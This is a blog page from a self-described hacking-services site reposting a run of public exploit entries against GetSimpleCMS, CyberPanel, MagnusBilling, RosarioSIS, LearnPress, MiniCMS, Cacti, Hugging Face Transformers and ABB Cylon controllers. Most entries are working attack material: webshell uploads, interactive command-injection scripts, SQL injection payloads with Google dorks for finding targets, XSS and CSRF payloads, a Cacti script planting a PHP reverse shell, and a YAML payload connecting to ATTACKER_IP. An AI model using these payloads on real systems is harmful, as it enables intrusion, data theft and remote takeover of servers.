Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863107034

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS
# Version: 3.3.16
# Tested on: Ubuntu Windows
# CVE : CVE-2021-28976

PoC-1:
1)Create a .phar file.
1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
<?php
try {
    // Initialize a new Phar object, name it "archive.phar"
    $phar = new Phar('archive.phar');

    // Set the stub (entry point) for the Phar file, pointing to index.php
    $phar->startBuffering();
    $phar->addFromString('index.php', file_get_contents('index.php'));
    $phar->setStub($phar->createDefaultStub('index.php'));
    $phar->stopBuffering();

    echo "Phar archive created successfully!";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}
3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. 
After running the script, you should find a file named archive.phar in your working directory.

2)Upload file:
1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. 
2. You can find the file at http://getsimplecms/data/uploads/.

3)Details:
 "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
    "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
    "Request URL": "http://getsimplecms/admin/upload.php",
    "Request Method": "POST",
    "Request Parameters": {
        "file": "<Malicious File>"
    },


PoC-2:
1) LLM creates the file exploit.phar with the following contents:
malicious.php                                                                                       0000644 0000000 0000000 00000000036 00000000000 010442  0                                                                                                    ustar 00                                                                                                                                                                                                                                                       <?php system($_GET['cmd']); ?>                  

2)
1. Prepare a PHP file named 'exploit.phar' .\n
2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n
3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).

[Replace Your Domain Name]
HireHackking 
# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/

#!/usr/bin/python3

import argparse
import httpx
import sys

RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"

print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit")
print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}")
print()

allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"]

parser = argparse.ArgumentParser()
parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}")
parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}")
args = parser.parse_args()

if args.endpoint not in allowed_endpoints:
    print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}")
    parser.print_help()
    sys.exit(1)

target = args.target
endpoint = args.endpoint

client = httpx.Client(base_url=target, verify=False)

try:
    response = client.get("/")
    response.raise_for_status()
except httpx.RequestError:
    print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}")
    sys.exit(1)

def get_token():
    response = client.get("/")
    return response.cookies.get("csrftoken")

def rce(client, csrf_token, cmd, endpoint):
    headers = {
        "X-CSRFToken": csrf_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    payload = '{"statusfile": "; %s; #"}' % cmd
    response = client.request("OPTIONS", endpoint, headers=headers, data=payload)
    return response.json().get("requestStatus")

csrf_token = get_token()
if not csrf_token:
    print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}")
    sys.exit(1)

while True:
    cmd = input(f"{YELLOW}$> {RESET}")
    print(rce(client, csrf_token, cmd, endpoint))
HireHackking 
# Exploit Title: MagnusSolution magnusbilling 7.3.0 - Command Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/magnussolution/magnusbilling7
# Software Link: https://github.com/magnussolution/magnusbilling7
# Version: 7.3.0 
# Tested on: Centos
# CVE : CVE-2023-30258


# PoC URL for Command Injection

http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt

Result: This PoC attempts to inject the id command.

[Replace Your Domain Name]
HireHackking 
# Exploit Title: RosarioSIS 7.6 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 7.6
# Tested on: Ubuntu Windows
# CVE : CVE-2021-44567

PoC:

POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest

constrain and some flow:
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array ) 

votes['; CREATE TABLE aaa(t text) --]=1
HireHackking

LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection

HACKER · %s · %s

# Exploit Title: LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection # Google Dork: inurl:"/wp-json/learnpress/v1/" OR inurl:"/wp-content/plugins/learnpress/" OR "powered by LearnPress" AND "version 4.2.7" # Date: [Current Date, e.g., October 30, 2024] # Exploit Author: [Your Name or Username] # Vendor Homepage: https://thimpress.com/learnpress/ # Software Link: https://wordpress.org/plugins/learnpress/ # Version: <= 4.2.7 # Tested on: WordPress 6.x, Ubuntu 22.04 CVE : CVE-2024-8522CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin (Python exploit) Overview CVE: CVE-2024-8522 Plugin: LearnPress – WordPress LMS Plugin (version <= 4.2.7) Type: SQL Injection Impact: High Affected Component: Unauthenticated endpoint parameter c_only_fields in LearnPress API Description The vulnerability exists in the LearnPress WordPress plugin, versions up to 4.2.7. An unauthenticated SQL Injection flaw is present in the c_only_fields parameter of the LearnPress API endpoint. This flaw allows attackers to execute arbitrary SQL commands by manipulating API requests without authentication. If exploited, this could lead to unauthorized database access, potentially exposing sensitive data or even allowing administrative control through database manipulation. Affected Code Path The vulnerability is triggered by accessing the LearnPress API and injecting SQL commands through the c_only_fields parameter. Below is the code path leading to this vulnerability: plaintext class-lp-db.php:702, LP_Database->execute() class-lp-course-db.php:564, LP_Course_DB->get_courses() Courses.php:241, LearnPress\Models\Courses::get_courses() class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses() class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request() class-wp-rest-server.php:1063, WP_REST_Server->dispatch() Proof of Concept (PoC) The vulnerability can be demonstrated by sending a request to the API endpoint with a malicious payload in the c_only_fields parameter. Below is an example of an HTTP request that injects a conditional SQL statement to test for vulnerability by causing a time delay: http GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1 Host: targetwebsite.com User-Agent: curl/7.81.0 Accept: */* Exploitation Script The following Python script automates the process of sending malicious requests to test for this SQL injection vulnerability by measuring response time, indicating potential success if there is a delay. python import requests import time # Target URL for the API endpoint url = ' http://targetwebsite.com/wp-json/learnpress/v1/courses ' # SQL injection payloads payloads = [ "IF(COUNT(*) > 0, SLEEP(10), 0)", # Test for successful injection "IF(1=1, SLEEP(10), 0)", # Basic true condition "IF(1=2, SLEEP(10), 0)", # Basic false condition ] # Iterate over payloads and measure response time for payload in payloads: params = {'c_only_fields': payload} start_time = time.time() # Record start time try: # Send request to the vulnerable endpoint response = requests.get(url, params=params) # Calculate response time response_time = time.time() - start_time # Display result print(f"Payload: {payload} | Status Code: {response.status_code} | Response Time: {response_time:.2f} seconds") # Check for delay indicative of a successful SQL injection if response_time > 10: print("Potential SQL Injection vulnerability detected (delay observed).") else: print("No delay observed; injection may be unsuccessful.") except requests.exceptions.RequestException as e: print(f"Error during request: {e}") Google Dorks for Identifying Vulnerable Sites To locate potentially vulnerable websites running LearnPress, the following Google dorks can help identify sites with the plugin: inurl:"/wp-content/plugins/learnpress/" inurl:"/wp-json/learnpress/v1/" "powered by LearnPress" AND "version 4.2.7" inurl:"/wp-content/plugins/learnpress/assets/js/" "LearnPress" AND "WordPress LMS Plugin" Disclaimer: Use of these dorks should only be conducted in an ethical manner, with proper permissions for testing on identified sites. Impact Analysis If exploited, this SQL Injection vulnerability can have severe impacts, including: Data Breach: Unauthorized access to sensitive data within the WordPress database, such as user credentials, course data, and personal information. Privilege Escalation: An attacker may leverage the SQL injection to modify database entries, potentially elevating user roles and gaining administrative access. Site Defacement or Service Disruption: By altering content or database configurations, attackers can disrupt service availability or deface the website. Recommendations Immediate Update: Update the LearnPress plugin to a patched version when available. Web Application Firewall (WAF): Employ a WAF that can filter and block malicious SQL injection attempts. Least Privilege Access: Configure database users with the minimum necessary privileges to reduce potential impacts. Conclusion The SQL Injection vulnerability in LearnPress (<= 4.2.7) is a high-severity issue that exposes affected WordPress sites to data breaches, privilege escalation, and potential service disruption. It is crucial for site administrators using this plugin to update to a secure version and implement protective measures. This report summarizes the vulnerability, exploitation methods, and recommendations to mitigate risks associated with CVE-2024-8522. Este mensaje, incluyendo sus anexos, puede contener información clasificada como confidencial dentro del marco del Sistema de Gestión de la Seguridad corporativo. Si usted no es el destinatario, le rogamos lo comunique al remitente y proceda a borrarlo, sin reenviarlo ni conservarlo, ya que su uso no autorizado está prohibido legalmente. This message including any attachments may contain confidential information, within the framework of the corporate Security Management System. If you are not the intended recipient, please notify the sender and delete this message without forwarding or retaining a copy, since any unauthorized use is strictly prohibited by law. Enviado con el correo electrónico seguro de [Proton Mail](https://proton.me/mail/home).
HireHackking

MiniCMS 1.1 - Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: MiniCMS 1.1 - Cross Site Scripting (XSS) # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/bg5sbk/MiniCMS # Software Link: https://github.com/bg5sbk/MiniCMS # Version: 1.10 # Tested on: Ubuntu Windows # CVE : CVE-2018-1000638 PoC: GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script> "Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>" [Replace Your Domain Name]
HireHackking
ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.07.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB BMS/BAS controller suffers from a weak password policy, allowing users to set overly simplistic or blank passwords and usernames without restrictions. This vulnerability significantly reduces account security, enabling attackers to exploit weak credentials for unauthorized access to the system. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5898 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5898.php CVE ID: CVE-2024-48845 CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48845 21.04.2024 --> P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ <body> <form action="http://192.168.73.31/userManagement.php" method="POST"> <input type="hidden" name="USER" value="admin2" /> <input type="hidden" name="PASSWORD" value="7" /> <input type="hidden" name="ACTION" value="Add" /> <input type="submit" value="Setirkaj." /> </form> </body> </html>
HireHackking
ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.03 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB BMS/BAS controller suffers from an authenticated reflected cross-site scripting vulnerability. Input passed to the GET parameters 'name' and 'id' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5897 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5897.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ http://192.168.73.31:7226/servlets/MapServices?cmd=<script>alert(document.cookie)</script>&id=251 http://192.168.73.31:7226/servlets/MapServices?cmd=readScheduleConfig&id=<script>confirm(document.cookie)</script>
HireHackking

Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated) # Date: 06/01/2025 # Exploit Author: D3Ext # Vendor Homepage: https://cacti.net/ # Software Link: https://github.com/Cacti/cacti/archive/refs/tags/release/1.2.26.zip # Version: 1.2.26 # Tested on: Kali Linux 2024 # CVE: CVE-2024-25641 #!/usr/bin/python3 import os import requests import base64 import gzip import time import argparse import string import random from bs4 import BeautifulSoup from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.asymmetric import padding, rsa from cryptography.hazmat.primitives import serialization def get_random_string(length): letters = string.ascii_lowercase result_str = ''.join(random.choice(letters) for i in range(length)) return result_str def check_version(url_to_check): r = requests.get(url_to_check) response = r.text if "Cacti CHANGELOG" in response and "1.2.26" in response and "1.2.27" not in response: print("[+] Version seems to be 1.2.26") else: print("[-] Version doesn't seem to be 1.2.26, proceeding anyway") # Main function if __name__ == '__main__': p = argparse.ArgumentParser(description="CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE") p.add_argument('--url', help="URL of the Cacti web root", required=True) p.add_argument('--user', help="username to log in", required=True) p.add_argument('--password', help="password of the username", required=True) p.add_argument('--lhost', help="local host to receive the reverse shell", required=True) p.add_argument('--lport', help="local port to receive the reverse shell", required=True) p.add_argument('--verbose', help="enable verbose", action='store_true', default=False, required=False) # Parse CLI arguments parser = p.parse_args() url = parser.url username = parser.user password = parser.password lhost = parser.lhost lport = parser.lport verbose = parser.verbose url = url.rstrip("/") print("CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE\n") # check if versions match print("[*] Checking Cacti version...") time.sleep(0.5) check = check_version(url + "/CHANGELOG") if check == False: sys.exit(0) req = requests.Session() if verbose: print("[*] Capturing CSRF token...") r = req.get(url) # extract CSRF token soup = BeautifulSoup(r.text, 'html.parser') html_parser = soup.find('input', {'name': '__csrf_magic'}) csrf_token = html_parser.get('value') if verbose: print("[+] CSRF token: " + csrf_token) print("[*] Logging in on " + url + "/index.php") # define login post data login_data = { '__csrf_magic': csrf_token, 'action': 'login', 'login_username': username, 'login_password': password, 'remember_me': 'on' } # send login request r = req.post(url + "/index.php", data=login_data) # check success if 'Logged in' in r.text: print("[+] Successfully logged in as " + username) else: print("[-] An error has ocurred while logging in as " + username) sys.exit(0) # generate random filename random_name = get_random_string(10) random_filename = random_name + ".php" payload = """<?php set_time_limit (0); $VERSION = "1.0"; $ip = '""" + lhost + """'; $port = """ + lport + """; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>""" # generate payload print("[*] Generating malicious payload...") keypair = rsa.generate_private_key(public_exponent=65537, key_size=2048) public_key = keypair.public_key().public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo) file_signature = keypair.sign(payload.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256()) b64_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8') b64_file_signature = base64.b64encode(file_signature).decode('utf-8') b64_public_key = base64.b64encode(public_key).decode('utf-8') data = """<xml> <files> <file> <name>resource/""" + random_filename + """</name> <data>""" + b64_payload + """</data> <filesignature>""" + b64_file_signature + """</filesignature> </file> </files> <publickey>""" + b64_public_key + """</publickey> <signature></signature> </xml>""" signature = keypair.sign(data.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256()) final_data = data.replace("<signature></signature>", "<signature>" + base64.b64encode(signature).decode('utf-8') + "</signature>").encode('utf-8') # write gzip data f = open(random_filename + ".gz", "wb") f.write(gzip.compress(final_data)) f.close() print("[+] Malicious GZIP: " + random_filename + ".gz") # define post data post_data = { '__csrf_magic': csrf_token, 'trust_signer': 'on', 'save_component_import': 1, 'action': 'save' } # upload file print("[*] Uploading GZIP file...") # send post request r = req.post(url + "/package_import.php?package_location=0&preview_only=on&remove_orphans=on&replace_svalues=on", data=post_data, files={'import_file': open(random_filename + ".gz", 'rb')}) print("[+] Successfully uploaded GZIP file") time.sleep(0.5) print("[*] Validating success...") soup = BeautifulSoup(r.text, 'html.parser') html_parser = soup.find('input', {'title': "/var/www/html/cacti/resource/" + random_filename}) file_id = html_parser.get('id') post_data = { '__csrf_magic': csrf_token, 'trust_signer': 'on', 'data_source_profile': 1, 'remove_orphans': 'on', 'replace_svalues': 'on', file_id: 'on', 'save_component_import': 1, 'preview_only': '', 'action': 'save', } r = req.post(url + "/package_import.php?header=false", data=post_data) print("[+] Success!") time.sleep(0.5) print("[*] Triggering reverse shell by sending GET request to " + url + "/resource/" + random_filename) time.sleep(0.2) print("[+] Check your netcat listener") # remove payload file os.remove(random_filename + ".gz") r = req.get(url + "/resource/" + random_filename)
HireHackking
# Exploit Title: Hugging Face Transformers MobileViTV2 RCE # Date: 29-11-2024 # Exploit Author: The Kernel Panic # Vendor Homepage: https://huggingface.co/ # Software Link: https://github.com/huggingface/transformers/releases # Version: 4.41.1 # Tested on: Linux, Windows, Mac # CVE : CVE-2024-11392 # Code flow from input to the vulnerable condition: # 1. The user downloads a third-party ml-cvnet model alongside its configuration file. # 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it. # 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code. # POC # Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below. # Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'. !!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')" # Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path > python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or # Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.
HireHackking
# Exploit title : ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) Remote Code Execution # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=4.00.00 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated blind command injection vulnerability. Input passed to the serial and ManufactureDate POST parameters is not properly sanitized, allowing attackers to execute arbitrary shell commands on the system. While factory test scripts included in the upgrade bundle are typically deleted, a short window for exploitation exists when the device is in the manufacturing phase. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5894 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5894.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ 